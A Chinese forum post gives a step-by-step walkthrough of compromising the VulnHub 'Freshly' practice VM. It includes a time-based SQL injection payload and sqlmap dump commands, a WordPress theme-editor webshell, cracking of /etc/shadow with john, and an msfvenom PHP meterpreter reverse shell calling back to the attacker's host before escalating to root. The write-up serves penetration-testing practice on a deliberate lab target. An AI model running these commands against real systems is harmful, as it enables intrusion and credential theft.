首页
论坛
专栏
课程

[原创]VulnHub-Freshly Writeup

2019-4-20 01:07 4600

[原创]VulnHub-Freshly Writeup

2019-4-20 01:07
4600

简介

VulnHub是国外的一个靶场平台,环境是各种各样的虚拟机镜像文件,比较适合做渗透测试的练习,网址:https://www.vulnhub.com/. 本次渗透环境是Frenshly.

目标

The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. :)
There are a couple of different ways that you can go with this one. Good luck!
Simply download and import the OVA file into virtualbox!

 

VulnHub note: You may have issues when importing to VMware. If this is the case. extract the HDD from the OVA file (using something like 7zip), and attach to a new VM. Please see the following guide: https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/.

信息搜集

端口扫描

Quick scan

nmap -T4 -F 192.168.1.104

 

结果:

Nmap scan report for 192.168.1.104
Host is up (0.00018s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
8080/tcp open  http-proxy
MAC Address: 08:00:27:D4:BC:A6 (Oracle VirtualBox virtual NIC)

80端口有一张图片:

 

在8080端口找到主站:http://192.168.1.104:8080/wordpress/

是wordpress系统

wpscan扫描

针对wordpress进行扫描:

wpscan --url http://192.168.1.104:8080/wordpress/

 

结果:

...
[+] WordPress version 4.1.26 identified (Latest, released on 2019-03-13).
...
[+] WordPress theme in use: twentythirteen
...
| Version: 1.4 (80% confidence)

[i] Plugin(s) Identified:

[+] all-in-one-seo-pack
 | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/
 | Last Updated: 2019-02-20T19:20:00.000Z
 | [!] The version is out of date, the latest version is 2.12
 |
 | Detected By: Comment (Passive Detection)
 |
 | [!] 5 vulnerabilities identified:
 |
 | [!] Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure
 |     Fixed in: 2.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7881
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902
 |      - http://jvn.jp/en/jp/JVN75615300/index.html
 |      - http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
 |
 | [!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)
 |     Fixed in: 2.2.6.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7916
 |      - https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
 |
 | [!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 2.3.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8538
 |      - http://seclists.org/fulldisclosure/2016/Jul/23
 |      - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
 |      - https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
 |      - https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability
 |      - https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/
 |
 | [!] Title: All in One SEO Pack <= 2.3.7 -  Unauthenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 2.3.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8558
 |      - https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/
 |      - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
 |
 | [!] Title: All in One SEO Pack <= 2.9.1.1 - Authenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 2.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9159
 |      - https://www.ripstech.com/php-security-calendar-2018/#day-4
 |      - https://wordpress.org/support/topic/a-critical-vulnerability-has-been-detected-in-this-plugin/
 |      - https://semperfiwebdesign.com/all-in-one-seo-pack-release-history/
 |
 | Version: 2.2.5.1 (60% confidence)
 | Detected By: Comment (Passive Detection)
 |  - http://192.168.1.104:8080/wordpress/, Match: 'All in One SEO Pack 2.2.5.1 by'

[+] cart66-lite
 | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/
 | Last Updated: 2016-01-27T21:11:00.000Z
 | [!] The version is out of date, the latest version is 1.5.8
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Cart66 Lite <= 1.5.3 - SQL Injection
 |     Fixed in: 1.5.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7737
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9442
 |      - https://research.g0blin.co.uk/cve-2014-9442/
 |
 | [!] Title: Cart66 Lite 1.5.4 - XSS
 |     Fixed in: 1.5.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8014
 |      - http://packetstormsecurity.com/files/130307/
 |
 | Version: 1.5.3 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt

[+] contact-form-7
 | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/
 | Last Updated: 2018-12-18T18:05:00.000Z
 | [!] The version is out of date, the latest version is 5.1.1
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
 |     Fixed in: 5.0.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9127
 |      - https://contactform7.com/2018/09/04/contact-form-7-504/
 |      - https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
 |      - https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
 |      - https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
 |      - https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
 |      - https://www.ripstech.com/php-security-calendar-2018/#day-18
 |
 | Version: 4.1 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt

[+] proplayer
 | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: ProPlayer 4.7.9.1 - SQL Injection
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6912
 |      - https://www.exploit-db.com/exploits/25605/
 |
 | Version: 4.7.9.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/readme.txt

扫描得到了wordpress版本、插件和存在的漏洞等信息,对以上存在sql注入漏洞的插件进行了测试,但都没有成功

 

扫描用户名:

wpscan --url http://192.168.1.104:8080/wordpress/ --enumerate u

结果:

[i] User(s) Identified:

[+] admin
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

扫描密码:

wpscan --url http://192.168.1.104:8080/wordpress --usernames admin --password-attack wp-login -P word1000.txt

没有得到密码

目录扫描

御剑扫描http://192.168.1.104/发现phpmyadmin,login.php

经过测试,phpmyadmin无法登陆

渗透

sql注入

对login.php

输入admin' or sleep(10)# ,页面回显明显停顿
存在注入,使用sqlmap:

sqlmap.py -u "http://192.168.1.104/login.php" --forms

 

未找到注入点,调高等级:

sqlmap.py -u "http://192.168.1.104/login.php" --forms --level=5 --risk=3

 

成功发现注入点:

sqlmap identified the following injection point(s) with a total of 6020 HTTP(s) requests:
---
Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: user=admin'||(SELECT 'CIgz' FROM DUAL WHERE 2964=2964 AND SLEEP(5))||'&password=uUbb&s=Submit
---
do you want to exploit this SQL injection? [Y/n] y
[23:21:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12

依次使用命令:

sqlmap.py -u "http://192.168.1.104/login.php" --forms --dbs

sqlmap.py -u "http://192.168.1.104/login.php" --forms --tables -D "wordpress8080"

sqlmap.py -u "http://192.168.1.104/login.php" --forms --tables -D "wordpress8080"

sqlmap.py -u "http://192.168.1.104/login.php" --forms --columns -T "users" -D "wordpress8080"

sqlmap.py -u "http://192.168.1.104/login.php" --forms --dump -C "username,password" -T "users" -D "wordpress8080"

 

获得wordpress的账号密码:

Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+

wordpress后台getshell

登陆wordpress的后台后,外观-编辑模板,随便找一个php文件写入一句话木马,然后菜刀连接:


菜刀上打开虚拟终端:

[/etc/]$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

当前非root用户
查看/etc/passwd文件:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

文件中存在提示,估计是要破解密码
下载/etc/passwd和/etc/shadow,在kali中:

unshadow passwd shadow > hashes.txt

 

将SuperSecretPassword也写入/usr/share/john/password.lst中,然后:

john hashes.txt

 


发现root用户密码就是SuperSecretPassword

提权

msf中生成反弹meterpreter:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.106 lport=5555 -f raw > frenshly.php

菜刀上传frenshly.php至目标,然后配置msf监听,收到反弹meterpreter后,输入shell命令进入shell控制台,输入"su - root"后提示必须在终端运行,于是输入python -c 'import pty;pty.spawn("/bin/bash")'进入终端完成提权.如下:

meterpreter > sysinfo
Computer    : Freshly
OS          : Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686
Meterpreter : php/linux
meterpreter > getuid
Server username: daemon (1)
meterpreter > shell
Process 1384 created.
Channel 0 created.
su - root
su: must be run from a terminal
python -c 'import pty;pty.spawn("/bin/bash")'
tythirteen$ ^[[C^[[C^[[C^[[C^[[C1-0/apps/wordpress/htdocs/wp-content/themes/twent

tythirteen$ su - root                                                            
su - root
Password: SuperSecretPassword

root@Freshly:~# id
id
uid=0(root) gid=0(root) groups=0(root)

总结

  • 信息收集十分重要,必须充分掌握目标的端口、目录等
  • 提高sqlmap的level、risk参数能使测试更加完整
  • 掌握kali下工具的使用:sqlmap、wpscan、john等


[招聘]欢迎市场人员加入看雪学院团队!

最新回复 (0)
游客
登录 | 注册 方可回帖
返回